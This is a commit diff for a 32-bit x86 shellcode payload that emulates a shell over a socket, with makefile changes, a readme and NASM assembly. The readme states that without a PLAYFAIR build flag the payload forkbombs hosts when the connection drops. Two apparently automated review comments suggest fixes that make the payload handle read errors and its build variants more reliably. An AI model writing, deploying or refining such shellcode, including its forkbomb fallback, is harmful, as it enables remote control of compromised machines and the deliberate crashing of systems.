
Commit eebc301

committed
PLAYFAIR
1 parent c02dc45 commit eebc301

3 files changed

+35
-27
lines changed


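--- a/32shellEmulator/makefile
+++ b/32shellEmulator/makefile
@@ -4,14 +4,16 @@ INCLUDEDIR = ../include/
 INCLUDE = -I $(INCLUDEDIR) -I $(RUNTIMEDIR)
 CFLAGS = -m32 $(INCLUDE)
 SFLAGS = -D INT80
+PLAYFAIR = -D PLAYFAIR
+
 
 TARGET=shell32.s
 
 all: assemble link
 
 assemble: $(TARGET)
-nasm -f elf $(TARGET) $(INCLUDE) -o shellcode.o $(SFLAGS)
-nasm $(TARGET) $(INCLUDE) -o shellcode $(SFLAGS)
+nasm -f elf $(TARGET) $(INCLUDE) -o shellcode.o $(SFLAGS) $(PLAYFAIR)
+nasm $(TARGET) $(INCLUDE) -o shellcode $(SFLAGS) $(PLAYFAIR)
 
 link: $(TARGET)
 gcc shellcode.o $(CFLAGS) -o test_shellcode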
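Review bot: The new `assemble` recipe passes `$(PLAYFAIR)` to both nasm invocations unconditionally, so the non-PLAYFAIR build that the readme describes cannot be produced through make without editing the makefile. Declaring the variable with a conditional assignment, `PLAYFAIR ?= -D PLAYFAIR`, keeps the graceful-exit build as the default while letting `make PLAYFAIR=` select the other variant from the command line. The recipe lines appear on this page without a leading tab, which is most likely a rendering artifact rather than the committed file, but is worth confirming since make requires it.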

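--- /dev/null
+++ b/32shellEmulator/readme
@@ -0,0 +1,2 @@
+32bit shell emulating payload will close gracefully when assembled with -D PLAYFAIR (Check makefile)
+If playfair is not defined, the payload will forkbomb when the socket is disconnected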

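--- a/32shellEmulator/shell32.s
+++ b/32shellEmulator/shell32.s
@@ -1,56 +1,60 @@
 ;; Evan Jensen 32bit shell emulating shellcode
 ;;
-
+BITS 32
 %include "short32.s"
 %include "syscall.s"
 %define BUFFERLEN 0x1ff
 
 global main
 
 main:
-
-do_fork:
-
-SYSTEM_CALL(fork)
-test eax,eax
-jz short child
-parent:
-push byte 0
-push byte 0
-push byte 0
-pop ebx
-pop ecx
-pop edx
-SYSTEM_CALL(waitpid)
-jmp short do_fork
-child:
-cld
 
 get_input:
 xor eax,eax
 cdq
 mov dx,BUFFERLEN
-sub esp,edx
 mov ecx,esp
 xor ebx,ebx
 SYSTEM_CALL(read)
 mov ebp,eax
 test eax,eax
-jz short do_exit ;synchronous IO or GTFO
-mov byte [eax+esp-1],0
+
+%ifdef PLAYFAIR
+jz short do_exit ;test if socket is closed
+%endif
+mov byte [esp+eax-1],0
+
 
+do_fork:
+
+SYSTEM_CALL(fork)
+test eax,eax
+jz short child
+parent:
+xor ebx,ebx
+xor ecx,ecx
+xor edx,edx
+SYSTEM_CALL(waitpid)
+jmp short main
 
-;; push eax ;return of read pushed by get_input
-;; pop ecx
+child:
 
+cld
 ;let's parse the arguments here
-xchg eax,ecx
+
+%ifndef PLAYFAIR
+test ebp,ebp ;return of read
+jz short do_fork
+%endif
+
+parse:
+mov ecx, ebp
 push byte " "
 pop eax ;space used for inlined strchr
 mov ebx,esp
 cdq ;msb of eax is zero so this is ok
 
-add esp,BUFFERLEN ;space for argv[]
+sub esp,BUFFERLEN ;space for argv[]
 add_token: ;; calculate the pointerp to push
 
 mov esi,ebp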
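Review bot: The `%ifdef PLAYFAIR` guard added after `test eax,eax` only catches a zero-length read; a failed read leaves `-errno` in eax, which is negative, so it falls through to `mov byte [esp+eax-1],0` (a write below the stack pointer) and then into `do_fork` with a negative byte count in ebp that `parse` copies into ecx. A signed branch, `jle short do_exit`, covers both the closed-socket and the error case, and the `%ifndef PLAYFAIR` check in `child` has the same gap. Separately, dropping `sub esp,edx` places the read buffer at [esp] and above, which is main's caller frame and return address when linked as test_shellcode; the parent never returns (`jmp short main`), so this only matters if `do_exit`, defined outside this hunk, returns instead of invoking an exit syscall, which is worth confirming.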
